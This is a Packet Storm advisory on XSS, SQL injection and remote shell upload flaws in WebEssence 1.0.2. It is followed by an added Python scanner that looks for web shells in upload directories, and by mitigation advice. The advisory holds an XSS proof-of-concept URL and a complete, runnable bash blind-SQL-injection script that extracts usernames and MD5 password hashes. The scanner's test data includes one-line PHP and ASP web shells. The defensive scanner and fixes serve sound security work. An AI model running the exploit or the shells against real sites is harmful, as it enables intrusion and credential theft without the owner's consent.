
WebEssence 1.0.2 Cross Site Scripting / SQL Injection

Date: 27 Apr 2010 00:00:00
Reported by: white_sheep
Type: packetstorm
Source: packetstormsecurity.com

WebEssence 1.0.2 Multiple Vulnerabilities: Cross Site Scripting, SQL Injection, Remote Shell Upload, Remote Blind SQL Injection

Code
```bash
#
# WebEssence 1.0.2 Multiple Vulnerabilities
#
# Bugs found by white_sheep, R00T_ATI and epicfail
# for Debug|Track session @ Backtrack|italia community conference
# www.backtrack.it
#
# # # # # # # # # XSS # # # # # # # # # # # #
# PoC:
# http://localhost/webessence/webessence/oembed.php?url=http://google.com&id=<script>alert('Backtrack|it');</script>
# The "id" parameter is reflected unescaped; the "url" parameter can also be
# pointed at a remote HTML page, which is then injected into the response.
#
# # # # # # Remote Shell Upload # # # # # # #
# PoC: (thanks to emgent)
# An unprivileged registered user can upload any PHP or ASP file; the upload
# is then reachable, and executable, under "uploads/other/".
#
# # # # # Remote Blind SQL Injection # # # # #
#
# The "itemid" POST parameter of comment_do.php is injectable. The script
# below uses a boolean oracle: when the injected predicate is true the
# server answers with an empty body, otherwise with content. It recovers,
# one character per position, the name and MD5 password hash from the
# users table. Caveats: only lowercase a-z is tried for the username, and
# the bare "SELECT ... FROM users" subquery only works while the table
# holds a single row (MySQL raises "Subquery returns more than 1 row"
# otherwise).

#!/bin/bash

url=$1
path=$2

# The original test used "||" inside a single [ ], which is a syntax error.
if [ -z "$url" ] || [ -z "$path" ]; then
  echo "Usage: $0 [url] [path]"
  echo "Example: $0 http://localhost /webessence"
  exit 1
fi

# Send one probe. Succeeds (exit 0) when the response body is empty,
# i.e. when the injected predicate evaluated to true.
probe() {
  local payload=$1
  local body
  body=$(curl -s -d "name=Ph33r&url=&email=&comment=Ph33r&itemid=$payload" \
    -H "Referer: $url$path" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    "$url$path/comment_do.php")
  [ -z "$body" ]
}

# Extract one column character by character: at each position try every
# candidate ASCII code in the charset; when none matches, the string has ended.
extract() {
  local column=$1 charset=$2
  local position=1 found code
  while :; do
    found=false
    for code in $charset; do
      if probe "1/**/AND/**/CHAR($code)=(SELECT/**/SUBSTRING($column,$position,1)/**/FROM/**/users)"; then
        printf "\\$(printf '%03o' "$code")"   # print the matched byte
        position=$((position + 1))
        found=true
        break
      fi
    done
    $found || break
  done
}

# SEARCH USERNAME: lowercase letters a-z (ASCII 97-122)
echo -n "Username: "
extract name "$(seq 97 122)"
echo ""

# SEARCH PASSWORD: hex digits 0-9 and a-f, the MD5 alphabet
echo -n "MD5 Pass: "
extract pwd "48 49 50 51 52 53 54 55 56 57 97 98 99 100 101 102"
echo ""
```
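The remote shell upload section states that any registered user can place PHP or ASP files under uploads/other/. The first thing a defender running WebEssence would want is a check of that directory for files the web server would execute or that contain server-side code regardless of their name. The scanner below is an added example, not code from the advisory or from WebEssence; the directory tree and sample files are constructed, and the extension and marker lists are a starting point rather than a complete web-shell signature set.

```python
"""Scan an upload directory for server-side scripts a user may have dropped.

Added example, not part of the advisory. The advisory reports that any
registered WebEssence user can upload PHP or ASP files that then live under
uploads/other/; this flags files a web server would execute by extension and
files that carry script code regardless of what they are named.
"""
import os
import re
import tempfile
from typing import List, Tuple

# Extensions Apache/IIS are commonly configured to hand to an interpreter.
EXEC_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar",
                   ".asp", ".aspx", ".jsp", ".cgi", ".pl"}

# Open tags for PHP and ASP. Matched on content, so "shell.jpg" is caught too.
SCRIPT_MARKERS = [
    re.compile(rb"<\?php", re.I),
    re.compile(rb"<\?="),
    re.compile(rb"<%"),
    re.compile(rb"<script[^>]+runat\s*=\s*[\"']?server", re.I),
]

# Typical web-shell building blocks: code execution fed from request data.
SUSPICIOUS_CALLS = [
    re.compile(rb"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I),
    re.compile(rb"base64_decode\s*\(", re.I),
    re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\["),
]


def classify_file(path: str) -> List[str]:
    """Return the reasons a file looks like a dropped web shell (empty = clean)."""
    reasons = []
    name = os.path.basename(path).lower()
    # Every dotted suffix counts, so shell.php.jpg is flagged as well as
    # shell.php (Apache with AddHandler executes on any recognised extension).
    suffixes = {"." + part for part in name.split(".")[1:]}
    if suffixes & EXEC_EXTENSIONS:
        reasons.append("executable extension")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)  # markers sit near the top; bound the read
    if any(p.search(head) for p in SCRIPT_MARKERS):
        reasons.append("server-side script marker")
    if any(p.search(head) for p in SUSPICIOUS_CALLS):
        reasons.append("dangerous call or request-driven input")
    return reasons


def scan_uploads(root: str) -> List[Tuple[str, List[str]]]:
    """Walk root and return (relative path, reasons) for every flagged file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            full = os.path.join(dirpath, fname)
            reasons = classify_file(full)
            if reasons:
                hits.append((os.path.relpath(full, root), reasons))
    return hits


def make_sample_uploads() -> str:
    """Create a constructed uploads/other/ tree in a temp dir: two benign files,
    a plain PHP shell, a PHP shell disguised as an image, and an ASP page."""
    root = tempfile.mkdtemp(prefix="uploads_other_")
    samples = {
        "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
        "notes.txt": b"just a text attachment\n",
        "shell.php": b"<?php eval($_POST['c']); ?>",
        "image.php.jpg": b"GIF89a<?php system($_GET[\"cmd\"]); ?>",
        "page.asp": b"<% Response.Write(Request(\"x\")) %>",
    }
    for fname, content in samples.items():
        with open(os.path.join(root, fname), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, why in scan_uploads(make_sample_uploads()):
        print(f"{rel}: {', '.join(why)}")
```

Finding a hit is the incident-response half; the fix on the application side is to stop the upload directory from ever executing: store uploads outside the document root or disable the script engine for that path (for Apache with mod_php, `php_admin_flag engine off` in the directory block, plus removing the handler for PHP extensions), give uploads server-generated names, and derive the accepted type from content rather than from the client-supplied filename.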
